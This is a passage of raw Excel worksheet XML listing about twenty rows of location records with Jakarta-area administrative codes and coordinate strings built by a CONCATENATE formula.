        <v>-611413</v>
      </c>
      <c r="X1532" t="s">
        <v>19603</v>
      </c>
      <c r="Y1532" t="str">
        <f t="shared" si="23"/>
        <v>-6.11413,106.86829</v>
      </c>
    </row>
    <row r="1533" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1533">
        <v>109058</v>
      </c>
      <c r="B1533" s="1">
        <v>43886</v>
      </c>
      <c r="C1533">
        <v>0</v>
      </c>
      <c r="D1533" t="s">
        <v>22</v>
      </c>
      <c r="E1533" t="s">
        <v>23</v>
      </c>
      <c r="F1533" t="s">
        <v>5315</v>
      </c>
      <c r="G1533" t="s">
        <v>5316</v>
      </c>
      <c r="H1533" t="s">
        <v>26</v>
      </c>
      <c r="I1533" t="s">
        <v>805</v>
      </c>
      <c r="J1533" t="s">
        <v>2627</v>
      </c>
      <c r="L1533" t="s">
        <v>5317</v>
      </c>
      <c r="M1533">
        <v>3275060001</v>
      </c>
      <c r="N1533">
        <v>3275060</v>
      </c>
      <c r="O1533">
        <v>3275</v>
      </c>
      <c r="P1533">
        <v>32</v>
      </c>
      <c r="Q1533" t="s">
        <v>611</v>
      </c>
      <c r="R1533" t="s">
        <v>114</v>
      </c>
      <c r="S1533" t="s">
        <v>41</v>
      </c>
      <c r="T1533" t="s">
        <v>42</v>
      </c>
      <c r="U1533" s="5">
        <v>10695456</v>
      </c>
      <c r="V1533" s="5" t="s">
        <v>15836</v>
      </c>
      <c r="W1533" s="5">
        <v>-623080</v>
      </c>
      <c r="X1533" t="s">
        <v>19604</v>
      </c>
      <c r="Y1533" t="str">
        <f t="shared" si="23"/>
        <v>-6.23080,106.95456</v>
      </c>
    </row>
    <row r="1534" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1534">
        <v>109059</v>
      </c>
      <c r="B1534" s="1">
        <v>43886</v>
      </c>
      <c r="C1534">
        <v>0</v>
      </c>
      <c r="D1534" t="s">
        <v>22</v>
      </c>
      <c r="E1534" t="s">
        <v>23</v>
      </c>
      <c r="F1534" t="s">
        <v>5318</v>
      </c>
      <c r="G1534" t="s">
        <v>5319</v>
      </c>
      <c r="H1534" t="s">
        <v>26</v>
      </c>
      <c r="I1534" t="s">
        <v>137</v>
      </c>
      <c r="J1534" t="s">
        <v>5320</v>
      </c>
      <c r="L1534" t="s">
        <v>5321</v>
      </c>
      <c r="M1534">
        <v>3173060008</v>
      </c>
      <c r="N1534">
        <v>3173060</v>
      </c>
      <c r="O1534">
        <v>3173</v>
      </c>
      <c r="P1534">
        <v>31</v>
      </c>
      <c r="Q1534" t="s">
        <v>329</v>
      </c>
      <c r="R1534" t="s">
        <v>61</v>
      </c>
      <c r="S1534" t="s">
        <v>62</v>
      </c>
      <c r="T1534" t="s">
        <v>33</v>
      </c>
      <c r="U1534" s="5">
        <v>10684595</v>
      </c>
      <c r="V1534" s="5" t="s">
        <v>15837</v>
      </c>
      <c r="W1534" s="5">
        <v>-615434</v>
      </c>
      <c r="X1534" t="s">
        <v>19605</v>
      </c>
      <c r="Y1534" t="str">
        <f t="shared" si="23"/>
        <v>-6.15434,106.84595</v>
      </c>
    </row>
    <row r="1535" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1535">
        <v>109060</v>
      </c>
      <c r="B1535" s="1">
        <v>43886</v>
      </c>
      <c r="C1535">
        <v>0</v>
      </c>
      <c r="D1535" t="s">
        <v>22</v>
      </c>
      <c r="E1535" t="s">
        <v>23</v>
      </c>
      <c r="F1535" t="s">
        <v>5322</v>
      </c>
      <c r="G1535" t="s">
        <v>5323</v>
      </c>
      <c r="H1535" t="s">
        <v>26</v>
      </c>
      <c r="I1535" t="s">
        <v>193</v>
      </c>
      <c r="J1535" t="s">
        <v>2627</v>
      </c>
      <c r="L1535" t="s">
        <v>5324</v>
      </c>
      <c r="M1535">
        <v>3275060008</v>
      </c>
      <c r="N1535">
        <v>3275060</v>
      </c>
      <c r="O1535">
        <v>3275</v>
      </c>
      <c r="P1535">
        <v>32</v>
      </c>
      <c r="Q1535" t="s">
        <v>2473</v>
      </c>
      <c r="R1535" t="s">
        <v>114</v>
      </c>
      <c r="S1535" t="s">
        <v>41</v>
      </c>
      <c r="T1535" t="s">
        <v>42</v>
      </c>
      <c r="U1535" s="5">
        <v>10697386</v>
      </c>
      <c r="V1535" s="5" t="s">
        <v>15838</v>
      </c>
      <c r="W1535" s="5">
        <v>-623953</v>
      </c>
      <c r="X1535" t="s">
        <v>19606</v>
      </c>
      <c r="Y1535" t="str">
        <f t="shared" si="23"/>
        <v>-6.23953,106.97386</v>
      </c>
    </row>
    <row r="1536" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1536">
        <v>109061</v>
      </c>
      <c r="B1536" s="1">
        <v>43886</v>
      </c>
      <c r="C1536">
        <v>0</v>
      </c>
      <c r="D1536" t="s">
        <v>22</v>
      </c>
      <c r="E1536" t="s">
        <v>23</v>
      </c>
      <c r="F1536" t="s">
        <v>5325</v>
      </c>
      <c r="G1536" t="s">
        <v>5326</v>
      </c>
      <c r="H1536" t="s">
        <v>26</v>
      </c>
      <c r="I1536" t="s">
        <v>27</v>
      </c>
      <c r="J1536" t="s">
        <v>5182</v>
      </c>
      <c r="L1536" t="s">
        <v>5327</v>
      </c>
      <c r="M1536">
        <v>3173070002</v>
      </c>
      <c r="N1536">
        <v>3173070</v>
      </c>
      <c r="O1536">
        <v>3173</v>
      </c>
      <c r="P1536">
        <v>31</v>
      </c>
      <c r="Q1536" t="s">
        <v>2710</v>
      </c>
      <c r="R1536" t="s">
        <v>323</v>
      </c>
      <c r="S1536" t="s">
        <v>62</v>
      </c>
      <c r="T1536" t="s">
        <v>33</v>
      </c>
      <c r="U1536" s="5">
        <v>10684132</v>
      </c>
      <c r="V1536" s="5" t="s">
        <v>15839</v>
      </c>
      <c r="W1536" s="5">
        <v>-614429</v>
      </c>
      <c r="X1536" t="s">
        <v>19607</v>
      </c>
      <c r="Y1536" t="str">
        <f t="shared" si="23"/>
        <v>-6.14429,106.84132</v>
      </c>
    </row>
    <row r="1537" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1537">
        <v>109062</v>
      </c>
      <c r="B1537" s="1">
        <v>43886</v>
      </c>
      <c r="C1537">
        <v>0</v>
      </c>
      <c r="D1537" t="s">
        <v>22</v>
      </c>
      <c r="E1537" t="s">
        <v>23</v>
      </c>
      <c r="F1537" t="s">
        <v>5328</v>
      </c>
      <c r="G1537" t="s">
        <v>5329</v>
      </c>
      <c r="H1537" t="s">
        <v>26</v>
      </c>
      <c r="I1537" t="s">
        <v>5330</v>
      </c>
      <c r="J1537" t="s">
        <v>2782</v>
      </c>
      <c r="L1537" t="s">
        <v>5331</v>
      </c>
      <c r="M1537">
        <v>3175030002</v>
      </c>
      <c r="N1537">
        <v>3175030</v>
      </c>
      <c r="O1537">
        <v>3175</v>
      </c>
      <c r="P1537">
        <v>31</v>
      </c>
      <c r="Q1537" t="s">
        <v>1592</v>
      </c>
      <c r="R1537" t="s">
        <v>1563</v>
      </c>
      <c r="S1537" t="s">
        <v>547</v>
      </c>
      <c r="T1537" t="s">
        <v>33</v>
      </c>
      <c r="U1537" s="5">
        <v>10687190</v>
      </c>
      <c r="V1537" s="5" t="s">
        <v>15840</v>
      </c>
      <c r="W1537" s="5">
        <v>-615616</v>
      </c>
      <c r="X1537" t="s">
        <v>19608</v>
      </c>
      <c r="Y1537" t="str">
        <f t="shared" si="23"/>
        <v>-6.15616,106.87190</v>
      </c>
    </row>
    <row r="1538" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1538">
        <v>109063</v>
      </c>
      <c r="B1538" s="1">
        <v>43886</v>
      </c>
      <c r="C1538">
        <v>0</v>
      </c>
      <c r="D1538" t="s">
        <v>22</v>
      </c>
      <c r="E1538" t="s">
        <v>23</v>
      </c>
      <c r="F1538" t="s">
        <v>5332</v>
      </c>
      <c r="H1538" t="s">
        <v>26</v>
      </c>
      <c r="I1538" t="s">
        <v>1683</v>
      </c>
      <c r="J1538" t="s">
        <v>2777</v>
      </c>
      <c r="L1538" t="s">
        <v>5333</v>
      </c>
      <c r="M1538">
        <v>3171070002</v>
      </c>
      <c r="N1538">
        <v>3171070</v>
      </c>
      <c r="O1538">
        <v>3171</v>
      </c>
      <c r="P1538">
        <v>31</v>
      </c>
      <c r="Q1538" t="s">
        <v>2142</v>
      </c>
      <c r="R1538" t="s">
        <v>121</v>
      </c>
      <c r="S1538" t="s">
        <v>108</v>
      </c>
      <c r="T1538" t="s">
        <v>33</v>
      </c>
      <c r="U1538" s="5">
        <v>10682357</v>
      </c>
      <c r="V1538" s="5" t="s">
        <v>15841</v>
      </c>
      <c r="W1538" s="5">
        <v>-625095</v>
      </c>
      <c r="X1538" t="s">
        <v>19609</v>
      </c>
      <c r="Y1538" t="str">
        <f t="shared" si="23"/>
        <v>-6.25095,106.82357</v>
      </c>
    </row>
    <row r="1539" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1539">
        <v>109064</v>
      </c>
      <c r="B1539" s="1">
        <v>43886</v>
      </c>
      <c r="C1539">
        <v>0</v>
      </c>
      <c r="D1539" t="s">
        <v>22</v>
      </c>
      <c r="E1539" t="s">
        <v>23</v>
      </c>
      <c r="F1539" t="s">
        <v>5334</v>
      </c>
      <c r="H1539" t="s">
        <v>26</v>
      </c>
      <c r="I1539" t="s">
        <v>517</v>
      </c>
      <c r="J1539" t="s">
        <v>3636</v>
      </c>
      <c r="L1539" t="s">
        <v>5335</v>
      </c>
      <c r="M1539">
        <v>3172090005</v>
      </c>
      <c r="N1539">
        <v>3172090</v>
      </c>
      <c r="O1539">
        <v>3172</v>
      </c>
      <c r="P1539">
        <v>31</v>
      </c>
      <c r="Q1539" t="s">
        <v>2749</v>
      </c>
      <c r="R1539" t="s">
        <v>890</v>
      </c>
      <c r="S1539" t="s">
        <v>49</v>
      </c>
      <c r="T1539" t="s">
        <v>33</v>
      </c>
      <c r="U1539" s="5">
        <v>10689076</v>
      </c>
      <c r="V1539" s="5" t="s">
        <v>15842</v>
      </c>
      <c r="W1539" s="5">
        <v>-619363</v>
      </c>
      <c r="X1539" t="s">
        <v>19610</v>
      </c>
      <c r="Y1539" t="str">
        <f t="shared" ref="Y1539:Y1602" si="24">CONCATENATE(X1539,",",V1539)</f>
        <v>-6.19363,106.89076</v>
      </c>
    </row>
    <row r="1540" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1540">
        <v>109065</v>
      </c>
      <c r="B1540" s="1">
        <v>43886</v>
      </c>
      <c r="C1540">
        <v>0</v>
      </c>
      <c r="D1540" t="s">
        <v>22</v>
      </c>
      <c r="E1540" t="s">
        <v>23</v>
      </c>
      <c r="F1540" t="s">
        <v>5336</v>
      </c>
      <c r="G1540" t="s">
        <v>5337</v>
      </c>
      <c r="H1540" t="s">
        <v>26</v>
      </c>
      <c r="I1540" t="s">
        <v>1046</v>
      </c>
      <c r="J1540" t="s">
        <v>5338</v>
      </c>
      <c r="L1540" t="s">
        <v>5339</v>
      </c>
      <c r="M1540">
        <v>3173060004</v>
      </c>
      <c r="N1540">
        <v>3173060</v>
      </c>
      <c r="O1540">
        <v>3173</v>
      </c>
      <c r="P1540">
        <v>31</v>
      </c>
      <c r="Q1540" t="s">
        <v>4713</v>
      </c>
      <c r="R1540" t="s">
        <v>61</v>
      </c>
      <c r="S1540" t="s">
        <v>62</v>
      </c>
      <c r="T1540" t="s">
        <v>33</v>
      </c>
      <c r="U1540" s="5">
        <v>10686334</v>
      </c>
      <c r="V1540" s="5" t="s">
        <v>15843</v>
      </c>
      <c r="W1540" s="5">
        <v>-615992</v>
      </c>
      <c r="X1540" t="s">
        <v>19611</v>
      </c>
      <c r="Y1540" t="str">
        <f t="shared" si="24"/>
        <v>-6.15992,106.86334</v>
      </c>
    </row>
    <row r="1541" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1541">
        <v>109066</v>
      </c>
      <c r="B1541" s="1">
        <v>43886</v>
      </c>
      <c r="C1541">
        <v>0</v>
      </c>
      <c r="D1541" t="s">
        <v>22</v>
      </c>
      <c r="E1541" t="s">
        <v>23</v>
      </c>
      <c r="F1541" t="s">
        <v>5340</v>
      </c>
      <c r="H1541" t="s">
        <v>26</v>
      </c>
      <c r="I1541" t="s">
        <v>1009</v>
      </c>
      <c r="J1541" t="s">
        <v>1656</v>
      </c>
      <c r="L1541" t="s">
        <v>5341</v>
      </c>
      <c r="M1541">
        <v>3173080003</v>
      </c>
      <c r="N1541">
        <v>3173080</v>
      </c>
      <c r="O1541">
        <v>3173</v>
      </c>
      <c r="P1541">
        <v>31</v>
      </c>
      <c r="Q1541" t="s">
        <v>157</v>
      </c>
      <c r="R1541" t="s">
        <v>157</v>
      </c>
      <c r="S1541" t="s">
        <v>62</v>
      </c>
      <c r="T1541" t="s">
        <v>33</v>
      </c>
      <c r="U1541" s="5">
        <v>10683123</v>
      </c>
      <c r="V1541" s="5" t="s">
        <v>15844</v>
      </c>
      <c r="W1541" s="5">
        <v>-618008</v>
      </c>
      <c r="X1541" t="s">
        <v>19612</v>
      </c>
      <c r="Y1541" t="str">
        <f t="shared" si="24"/>
        <v>-6.18008,106.83123</v>
      </c>
    </row>
    <row r="1542" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1542">
        <v>109067</v>
      </c>
      <c r="B1542" s="1">
        <v>43886</v>
      </c>
      <c r="C1542">
        <v>0</v>
      </c>
      <c r="D1542" t="s">
        <v>22</v>
      </c>
      <c r="E1542" t="s">
        <v>23</v>
      </c>
      <c r="F1542" t="s">
        <v>5342</v>
      </c>
      <c r="G1542" t="s">
        <v>5343</v>
      </c>
      <c r="H1542" t="s">
        <v>26</v>
      </c>
      <c r="I1542" t="s">
        <v>974</v>
      </c>
      <c r="J1542" t="s">
        <v>1152</v>
      </c>
      <c r="L1542" t="s">
        <v>5344</v>
      </c>
      <c r="M1542">
        <v>3173070001</v>
      </c>
      <c r="N1542">
        <v>3173070</v>
      </c>
      <c r="O1542">
        <v>3173</v>
      </c>
      <c r="P1542">
        <v>31</v>
      </c>
      <c r="Q1542" t="s">
        <v>322</v>
      </c>
      <c r="R1542" t="s">
        <v>323</v>
      </c>
      <c r="S1542" t="s">
        <v>62</v>
      </c>
      <c r="T1542" t="s">
        <v>33</v>
      </c>
      <c r="U1542" s="5">
        <v>10683838</v>
      </c>
      <c r="V1542" s="5" t="s">
        <v>15845</v>
      </c>
      <c r="W1542" s="5">
        <v>-616883</v>
      </c>
      <c r="X1542" t="s">
        <v>19613</v>
      </c>
      <c r="Y1542" t="str">
        <f t="shared" si="24"/>
        <v>-6.16883,106.83838</v>
      </c>
    </row>
    <row r="1543" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1543">
        <v>109068</v>
      </c>
      <c r="B1543" s="1">
        <v>43886</v>
      </c>
      <c r="C1543">
        <v>0</v>
      </c>
      <c r="D1543" t="s">
        <v>22</v>
      </c>
      <c r="E1543" t="s">
        <v>23</v>
      </c>
      <c r="F1543" t="s">
        <v>5345</v>
      </c>
      <c r="G1543" t="s">
        <v>5346</v>
      </c>
      <c r="H1543" t="s">
        <v>26</v>
      </c>
      <c r="I1543" t="s">
        <v>1862</v>
      </c>
      <c r="J1543" t="s">
        <v>266</v>
      </c>
      <c r="M1543">
        <v>3174010006</v>
      </c>
      <c r="N1543">
        <v>3174010</v>
      </c>
      <c r="O1543">
        <v>3174</v>
      </c>
      <c r="P1543">
        <v>31</v>
      </c>
      <c r="Q1543" t="s">
        <v>268</v>
      </c>
      <c r="R1543" t="s">
        <v>69</v>
      </c>
      <c r="S1543" t="s">
        <v>32</v>
      </c>
      <c r="T1543" t="s">
        <v>33</v>
      </c>
      <c r="U1543" s="5">
        <v>10674033</v>
      </c>
      <c r="V1543" s="5" t="s">
        <v>15846</v>
      </c>
      <c r="W1543" s="5">
        <v>-617531</v>
      </c>
      <c r="X1543" t="s">
        <v>18406</v>
      </c>
      <c r="Y1543" t="str">
        <f t="shared" si="24"/>
        <v>-6.17531,106.74033</v>
      </c>
    </row>
    <row r="1544" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1544">
        <v>109069</v>
      </c>
      <c r="B1544" s="1">
        <v>43886</v>
      </c>
      <c r="C1544">
        <v>0</v>
      </c>
      <c r="D1544" t="s">
        <v>22</v>
      </c>
      <c r="E1544" t="s">
        <v>23</v>
      </c>
      <c r="F1544" t="s">
        <v>5347</v>
      </c>
      <c r="G1544" t="s">
        <v>5348</v>
      </c>
      <c r="H1544" t="s">
        <v>26</v>
      </c>
      <c r="I1544" t="s">
        <v>753</v>
      </c>
      <c r="J1544" t="s">
        <v>3259</v>
      </c>
      <c r="M1544">
        <v>3172100006</v>
      </c>
      <c r="N1544">
        <v>3172100</v>
      </c>
      <c r="O1544">
        <v>3172</v>
      </c>
      <c r="P1544">
        <v>31</v>
      </c>
      <c r="Q1544" t="s">
        <v>1435</v>
      </c>
      <c r="R1544" t="s">
        <v>1436</v>
      </c>
      <c r="S1544" t="s">
        <v>49</v>
      </c>
      <c r="T1544" t="s">
        <v>33</v>
      </c>
      <c r="U1544" s="5">
        <v>10686881</v>
      </c>
      <c r="V1544" s="5" t="s">
        <v>15847</v>
      </c>
      <c r="W1544" s="5">
        <v>-619740</v>
      </c>
      <c r="X1544" t="s">
        <v>19614</v>
      </c>
      <c r="Y1544" t="str">
        <f t="shared" si="24"/>
        <v>-6.19740,106.86881</v>
      </c>
    </row>
    <row r="1545" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1545">
        <v>109070</v>
      </c>
      <c r="B1545" s="1">
        <v>43886</v>
      </c>
      <c r="C1545">
        <v>0</v>
      </c>
      <c r="D1545" t="s">
        <v>22</v>
      </c>
      <c r="E1545" t="s">
        <v>23</v>
      </c>
      <c r="F1545" t="s">
        <v>5349</v>
      </c>
      <c r="H1545" t="s">
        <v>26</v>
      </c>
      <c r="I1545" t="s">
        <v>2005</v>
      </c>
      <c r="J1545" t="s">
        <v>4224</v>
      </c>
      <c r="L1545" t="s">
        <v>5350</v>
      </c>
      <c r="M1545">
        <v>3173060003</v>
      </c>
      <c r="N1545">
        <v>3173060</v>
      </c>
      <c r="O1545">
        <v>3173</v>
      </c>
      <c r="P1545">
        <v>31</v>
      </c>
      <c r="Q1545" t="s">
        <v>3773</v>
      </c>
      <c r="R1545" t="s">
        <v>61</v>
      </c>
      <c r="S1545" t="s">
        <v>62</v>
      </c>
      <c r="T1545" t="s">
        <v>33</v>
      </c>
      <c r="U1545" s="5">
        <v>10686646</v>
      </c>
      <c r="V1545" s="5" t="s">
        <v>15848</v>
      </c>
      <c r="W1545" s="5">
        <v>-615951</v>
      </c>
      <c r="X1545" t="s">
        <v>19615</v>
      </c>
      <c r="Y1545" t="str">
        <f t="shared" si="24"/>
        <v>-6.15951,106.86646</v>
      </c>
    </row>
    <row r="1546" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1546">
        <v>109071</v>
      </c>
      <c r="B1546" s="1">
        <v>43886</v>
      </c>
      <c r="C1546">
        <v>0</v>
      </c>
      <c r="D1546" t="s">
        <v>22</v>
      </c>
      <c r="E1546" t="s">
        <v>23</v>
      </c>
      <c r="F1546" t="s">
        <v>5351</v>
      </c>
      <c r="G1546" t="s">
        <v>5352</v>
      </c>
      <c r="H1546" t="s">
        <v>26</v>
      </c>
      <c r="I1546" t="s">
        <v>5353</v>
      </c>
      <c r="J1546" t="s">
        <v>2845</v>
      </c>
      <c r="M1546">
        <v>3172070003</v>
      </c>
      <c r="N1546">
        <v>3172070</v>
      </c>
      <c r="O1546">
        <v>3172</v>
      </c>
      <c r="P1546">
        <v>31</v>
      </c>
      <c r="Q1546" t="s">
        <v>2659</v>
      </c>
      <c r="R1546" t="s">
        <v>128</v>
      </c>
      <c r="S1546" t="s">
        <v>49</v>
      </c>
      <c r="T1546" t="s">
        <v>33</v>
      </c>
      <c r="U1546" s="5">
        <v>10693277</v>
      </c>
      <c r="V1546" s="5" t="s">
        <v>15849</v>
      </c>
      <c r="W1546" s="5">
        <v>-623786</v>
      </c>
      <c r="X1546" t="s">
        <v>19616</v>
      </c>
      <c r="Y1546" t="str">
        <f t="shared" si="24"/>
        <v>-6.23786,106.93277</v>
      </c>
    </row>
    <row r="1547" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1547">
        <v>109072</v>
      </c>
      <c r="B1547" s="1">
        <v>43886</v>
      </c>
      <c r="C1547">
        <v>0</v>
      </c>
      <c r="D1547" t="s">
        <v>22</v>
      </c>
      <c r="E1547" t="s">
        <v>23</v>
      </c>
      <c r="F1547" t="s">
        <v>5354</v>
      </c>
      <c r="G1547" t="s">
        <v>5355</v>
      </c>
      <c r="H1547" t="s">
        <v>26</v>
      </c>
      <c r="I1547" t="s">
        <v>628</v>
      </c>
      <c r="J1547" t="s">
        <v>5356</v>
      </c>
      <c r="L1547" t="s">
        <v>5357</v>
      </c>
      <c r="M1547">
        <v>3172040002</v>
      </c>
      <c r="N1547">
        <v>3172040</v>
      </c>
      <c r="O1547">
        <v>3172</v>
      </c>
      <c r="P1547">
        <v>31</v>
      </c>
      <c r="Q1547" t="s">
        <v>281</v>
      </c>
      <c r="R1547" t="s">
        <v>281</v>
      </c>
      <c r="S1547" t="s">
        <v>49</v>
      </c>
      <c r="T1547" t="s">
        <v>33</v>
      </c>
      <c r="U1547" s="5">
        <v>10687981</v>
      </c>
      <c r="V1547" s="5" t="s">
        <v>15850</v>
      </c>
      <c r="W1547" s="5">
        <v>-628336</v>
      </c>
      <c r="X1547" t="s">
        <v>19617</v>
      </c>
      <c r="Y1547" t="str">
        <f t="shared" si="24"/>
        <v>-6.28336,106.87981</v>
      </c>
    </row>
    <row r="1548" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1548">
        <v>109073</v>
      </c>
      <c r="B1548" s="1">
        <v>43886</v>
      </c>
      <c r="C1548">
        <v>0</v>
      </c>
      <c r="D1548" t="s">
        <v>22</v>
      </c>
      <c r="E1548" t="s">
        <v>23</v>
      </c>
      <c r="F1548" t="s">
        <v>5358</v>
      </c>
      <c r="G1548" t="s">
        <v>5359</v>
      </c>
      <c r="H1548" t="s">
        <v>26</v>
      </c>
      <c r="I1548" t="s">
        <v>72</v>
      </c>
      <c r="J1548" t="s">
        <v>1656</v>
      </c>
      <c r="M1548">
        <v>3173080003</v>
      </c>
      <c r="N1548">
        <v>3173080</v>
      </c>
      <c r="O1548">
        <v>3173</v>
      </c>
      <c r="P1548">
        <v>31</v>
      </c>
      <c r="Q1548" t="s">
        <v>157</v>
      </c>
      <c r="R1548" t="s">
        <v>157</v>
      </c>
      <c r="S1548" t="s">
        <v>62</v>
      </c>
      <c r="T1548" t="s">
        <v>33</v>
      </c>
      <c r="U1548" s="5">
        <v>10683031</v>
      </c>
      <c r="V1548" s="5" t="s">
        <v>15851</v>
      </c>
      <c r="W1548" s="5">
        <v>-618287</v>
      </c>
      <c r="X1548" t="s">
        <v>19618</v>
      </c>
      <c r="Y1548" t="str">
        <f t="shared" si="24"/>
        <v>-6.18287,106.83031</v>
      </c>
    </row>
    <row r="1549" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1549">
        <v>109074</v>
      </c>
      <c r="B1549" s="1">
        <v>43886</v>
      </c>
      <c r="C1549">
        <v>0</v>
      </c>
      <c r="D1549" t="s">
        <v>22</v>
      </c>
      <c r="E1549" t="s">
        <v>23</v>
      </c>
      <c r="F1549" t="s">
        <v>5360</v>
      </c>
      <c r="G1549" t="s">
        <v>5361</v>
      </c>
      <c r="H1549" t="s">
        <v>26</v>
      </c>
      <c r="I1549" t="s">
        <v>1389</v>
      </c>
      <c r="J1549" t="s">
        <v>2194</v>
      </c>
      <c r="L1549" t="s">
        <v>5362</v>
      </c>
      <c r="M1549">
        <v>3175050002</v>
      </c>
      <c r="N1549">
        <v>3175050</v>
      </c>
      <c r="O1549">
        <v>3175</v>
      </c>
      <c r="P1549">
        <v>31</v>
      </c>
      <c r="Q1549" t="s">
        <v>1012</v>
      </c>
      <c r="R1549" t="s">
        <v>1013</v>
      </c>
      <c r="S1549" t="s">
        <v>547</v>
      </c>
      <c r="T1549" t="s">
        <v>33</v>
      </c>
      <c r="U1549" s="5">
        <v>10690314</v>
      </c>
      <c r="V1549" s="5" t="s">
        <v>15852</v>
      </c>
      <c r="W1549" s="5">
        <v>-617443</v>
      </c>
      <c r="X1549" t="s">
        <v>19619</v>
      </c>
      <c r="Y1549" t="str">
        <f t="shared" si="24"/>
        <v>-6.17443,106.90314</v>
      </c>
    </row>
    <row r="1550" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1550">
        <v>109075</v>
      </c>
      <c r="B1550" s="1">
        <v>43886</v>
      </c>
      <c r="C1550">
        <v>0</v>
      </c>
      <c r="D1550" t="s">
        <v>22</v>
      </c>
      <c r="E1550" t="s">
        <v>23</v>
      </c>
      <c r="F1550" t="s">
        <v>5363</v>
      </c>
      <c r="G1550" t="s">
        <v>5364</v>
      </c>
      <c r="H1550" t="s">
        <v>26</v>
      </c>
      <c r="I1550" t="s">
        <v>2002</v>
      </c>
      <c r="J1550" t="s">
        <v>2627</v>
      </c>
      <c r="L1550" t="s">
        <v>5365</v>
      </c>
      <c r="M1550">
        <v>3216081006</v>
      </c>
      <c r="N1550">
        <v>3216081</v>
      </c>
      <c r="O1550">
        <v>3216</v>
      </c>
      <c r="P1550">
        <v>32</v>
      </c>
      <c r="Q1550" t="s">
        <v>2511</v>
      </c>
      <c r="R1550" t="s">
        <v>2512</v>
      </c>
      <c r="S1550" t="s">
        <v>41</v>
      </c>
      <c r="T1550" t="s">
        <v>42</v>
      </c>
      <c r="U1550" s="5">
        <v>10704756</v>
      </c>
      <c r="V1550" s="5" t="s">
        <v>15853</v>
      </c>
      <c r="W1550" s="5">
        <v>-623861</v>
      </c>
      <c r="X1550" t="s">
        <v>19620</v>
      </c>
      <c r="Y1550" t="str">
        <f t="shared" si="24"/>
        <v>-6.23861,107.04756</v>
      </c>
    </row>
    <row r="1551" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1551">
        <v>109076</v>
      </c>
      <c r="B1551" s="1">
        <v>43886</v>
      </c>
      <c r="C1551">
        <v>0</v>
      </c>
      <c r="D1551" t="s">
        <v>22</v>
      </c>
      <c r="E1551" t="s">
        <v>23</v>
      </c>
      <c r="F1551" t="s">
        <v>5366</v>
      </c>
      <c r="H1551" t="s">
        <v>26</v>
      </c>
      <c r="I1551" t="s">
        <v>1394</v>
      </c>
      <c r="J1551" t="s">
        <v>2683</v>
      </c>
      <c r="M1551">
        <v>3172070002</v>
      </c>
      <c r="N1551">
        <v>3172070</v>
      </c>
      <c r="O1551">
        <v>3172</v>
      </c>
      <c r="P1551">
        <v>31</v>
      </c>
      <c r="Q1551" t="s">
        <v>128</v>
      </c>
      <c r="R1551" t="s">
        <v>128</v>
      </c>
      <c r="S1551" t="s">
        <v>49</v>
      </c>
      <c r="T1551" t="s">
        <v>33</v>
      </c>
      <c r="U1551" s="5">
        <v>10691427</v>
      </c>
      <c r="V1551" s="5" t="s">
        <v>15854</v>
      </c>
      <c r="W1551" s="5">
        <v>-624203</v>
      </c>
      <c r="X1551" t="s">
        <v>19621</v>
      </c>
      <c r="Y1551" t="str">
        <f t="shared" si="24"/>
        <v>-6.24203,106.91427</v>
      </c>
    </row>
    <row r="1552" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1552">
        <v>109077</v>
      </c>
      <c r="B1552" s="1">
        <v>43886</v>
      </c>
      <c r="C1552">
        <v>0</v>
      </c>
      <c r="D1552" t="s">
        <v>22</v>
      </c>
      <c r="E1552" t="s">
        <v>23</v>
      </c>
      <c r="F1552" t="s">
        <v>5367</v>
      </c>
      <c r="G1552" t="s">
        <v>5368</v>
      </c>
      <c r="H1552" t="s">
        <v>26</v>
      </c>
      <c r="I1552" t="s">
        <v>834</v>
      </c>
      <c r="J1552" t="s">
        <v>5369</v>
      </c>
      <c r="M1552">
        <v>3174040006</v>
      </c>
      <c r="N1552">
        <v>3174040</v>
      </c>
      <c r="O1552">
        <v>3174</v>
      </c>
      <c r="P1552">
        <v>31</v>
      </c>
      <c r="Q1552" t="s">
        <v>1553</v>
      </c>
      <c r="R1552" t="s">
        <v>377</v>
      </c>
      <c r="S1552" t="s">
        <v>32</v>
      </c>
      <c r="T1552" t="s">
        <v>33</v>
      </c>
      <c r="U1552" s="5">
        <v>10677453</v>
      </c>
      <c r="V1552" s="5" t="s">
        <v>15855</v>
      </c>
      <c r="W1552" s="5">
        <v>-614816</v>
      </c>
      <c r="X1552" t="s">
        <v>19622</v>
      </c>
      <c r="Y1552" t="str">
        <f t="shared" si="24"/>
        <v>-6.14816,106.77453</v>
      </c>
    </row>
    <row r="1553" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1553">
        <v>109078</v>
      </c>
      <c r="B1553" s="1">
        <v>43886</v>
      </c>
      <c r="C1553">
        <v>0</v>
      </c>
      <c r="D1553" t="s">
        <v>22</v>
      </c>
      <c r="E1553" t="s">
        <v>23</v>
      </c>
      <c r="F1553" t="s">
        <v>5370</v>
      </c>
      <c r="G1553" t="s">
        <v>5371</v>
      </c>
      <c r="H1553" t="s">
        <v>26</v>
      </c>
      <c r="I1553" t="s">
        <v>76</v>
      </c>
      <c r="J1553" t="s">
        <v>5372</v>
      </c>
      <c r="L1553" t="s">
        <v>5373</v>
      </c>
      <c r="M1553">
        <v>3175020003</v>
      </c>
      <c r="N1553">
        <v>3175020</v>
      </c>
      <c r="O1553">
        <v>3175</v>
      </c>
      <c r="P1553">
        <v>31</v>
      </c>
      <c r="Q1553" t="s">
        <v>2667</v>
      </c>
      <c r="R1553" t="s">
        <v>2228</v>
      </c>
      <c r="S1553" t="s">
